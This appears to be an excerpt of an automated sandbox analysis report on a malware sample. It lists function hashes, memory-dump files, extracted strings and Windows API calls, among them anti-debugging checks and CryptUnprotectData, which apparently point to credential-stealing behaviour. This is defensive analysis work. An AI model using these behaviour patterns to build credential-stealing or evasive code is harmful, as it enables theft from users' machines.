                                                                                                • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                                                                                • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                                                                                • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                                                                                • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                • String ID: eM
                                                                                                • API String ID: 2579439406-4107679315
                                                                                                • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                                                                                • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                                                                                • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                                                                                • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: UNIQUE$BINARY$bua$index$invalid rootpage$sqlite_master$sqlite_temp_master
                                                                                                • API String ID: 0-1733444394
                                                                                                • Opcode ID: c992c50281e1d2a2ecb6a3a695e9d7902225fb130184855efa50adbf899f08fd
                                                                                                • Instruction ID: c52f25025489653eb610d6e343a086c80a5a7374dd8721026aec1ef0af0b0df4
                                                                                                • Opcode Fuzzy Hash: c992c50281e1d2a2ecb6a3a695e9d7902225fb130184855efa50adbf899f08fd
                                                                                                • Instruction Fuzzy Hash: 1892F174E08255CFDB51CFA8C580B99BBF1BF89308F65C1A9E859AB352D734E881CB41
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID: NEAR
                                                                                                • API String ID: 1475443563-1088024997
                                                                                                • Opcode ID: f6a487f5c91de3cc1bef6fa6d898b170e9b402afe5ec80a6956fdd34adb5da4d
                                                                                                • Instruction ID: b4e98ac7f2dea276e522b18a44adf406a464a3194d3be0cff96e2c83306ccf13
                                                                                                • Opcode Fuzzy Hash: f6a487f5c91de3cc1bef6fa6d898b170e9b402afe5ec80a6956fdd34adb5da4d
                                                                                                • Instruction Fuzzy Hash: 464234B4D08289CFDB80CFA8C18479DBBF1BB49308FA4C45AD8549B345D776E8A6CB51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 2$BINARY$E$NOCASE$false$u
                                                                                                • API String ID: 0-3666730823
                                                                                                • Opcode ID: 44b2ffa57a66e06a5b41c824db9348c812c03fba735669014661c96b475b74fa
                                                                                                • Instruction ID: 6b9246b4563a5e155af7b98e7ab84f845b82c0e831d1f7dba739a0367b6c7f33
                                                                                                • Opcode Fuzzy Hash: 44b2ffa57a66e06a5b41c824db9348c812c03fba735669014661c96b475b74fa
                                                                                                • Instruction Fuzzy Hash: 39F24774A442598FDB10CFA8C480B8DBBF5BF49318F65C169E858AB355D734EC86CB90
                                                                                                APIs
                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: BinaryCryptLocalString$AllocFree
                                                                                                • String ID: >O@
                                                                                                • API String ID: 4291131564-3498640338
                                                                                                • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                                                                                • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                                                                                • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                                                                                • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$$-$-$Inf$NaN
                                                                                                • API String ID: 0-2883260867
                                                                                                • Opcode ID: 028b7e2239e5b65ec7313dae655860b22c75c4cb4265c042bc54a10a851200c5
                                                                                                • Instruction ID: 08ada5b9c357915bf8dc0511ebd4b169d1569d08758c0a6763b5a4183e8dfcc3
                                                                                                • Opcode Fuzzy Hash: 028b7e2239e5b65ec7313dae655860b22c75c4cb4265c042bc54a10a851200c5
                                                                                                • Instruction Fuzzy Hash: 8D92B370E4D2958EDB219B68C881398BBF1AB86344F34C4D9C49D9736AE735CAC9CF41
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: A$]a$bua$ha$ma$snippet
                                                                                                • API String ID: 0-4021802672
                                                                                                • Opcode ID: d6770a0123dd894d56e0e9e880f92b69bc54195843cf986bada51ecccccb81b0
                                                                                                • Instruction ID: b2623b0ed89b922f0be96898bd960c36401f43a5980a856a5f0c11e76d1438fa
                                                                                                • Opcode Fuzzy Hash: d6770a0123dd894d56e0e9e880f92b69bc54195843cf986bada51ecccccb81b0
                                                                                                • Instruction Fuzzy Hash: C392CF7490426ACFDB64CF69C884BC9B7B1BB48314F2486EAD85DAB250D7709EC5CF90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: missing from index $d$non-unique entry in index $q$row $wrong # of entries in index
                                                                                                • API String ID: 0-2434882124
                                                                                                • Opcode ID: 7b4e3502c80a4384d77415debf17acac60d31245c151a2030a67de06a2fb1782
                                                                                                • Instruction ID: 64764bd2453105caa9badb98113fecf854144ac2eeaebcc13dcf1322e2d74596
                                                                                                • Opcode Fuzzy Hash: 7b4e3502c80a4384d77415debf17acac60d31245c151a2030a67de06a2fb1782
                                                                                                • Instruction Fuzzy Hash: 5272E374A042898FDB50DFA8C59079DBBF1BB88304F20C56DE8A8AB395D775E942CF41
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 61EAF94F
                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 61EAF95F
                                                                                                • GetCurrentProcess.KERNEL32 ref: 61EAF968
                                                                                                • TerminateProcess.KERNEL32 ref: 61EAF979
                                                                                                • abort.MSVCRT ref: 61EAF982
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                • String ID:
                                                                                                • API String ID: 520269711-0
                                                                                                • Opcode ID: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
                                                                                                • Instruction ID: c24ac7f06ebf37709200600ee493e26a75483ae19b01d267103323a56ae8c6ad
                                                                                                • Opcode Fuzzy Hash: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
                                                                                                • Instruction Fuzzy Hash: A911C0B5A14A04CFDB00EFB9D64861EBBF0EB5A304F548929E998CB311E774D9848F52
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                • String ID:
                                                                                                • API String ID: 3657800372-0
                                                                                                • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                                                                                • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                                                                                • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                                                                                • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                                                                                APIs
                                                                                                • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                                • String ID: ,<A
                                                                                                • API String ID: 123533781-3158208111
                                                                                                • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                                                                                • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                                                                                • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                                                                                • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $ASC$DESC$bua$bua
                                                                                                • API String ID: 0-1029442847
                                                                                                • Opcode ID: bf6a387133fc9ba796b2267b9702a36892ca5dcc5900f9bd3948313b72cb0120
                                                                                                • Instruction ID: 8ab5de4e3564c360289137fee1b889a4ea914830ed3e88a553d2216b992680de
                                                                                                • Opcode Fuzzy Hash: bf6a387133fc9ba796b2267b9702a36892ca5dcc5900f9bd3948313b72cb0120
                                                                                                • Instruction Fuzzy Hash: 0852E2B4A053498FDB10CFA9C580A8EBBF1BF89304F25856DE899AB351D734E846CF51
                                                                                                APIs
                                                                                                • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: BinaryCryptString
                                                                                                • String ID:
                                                                                                • API String ID: 80407269-0
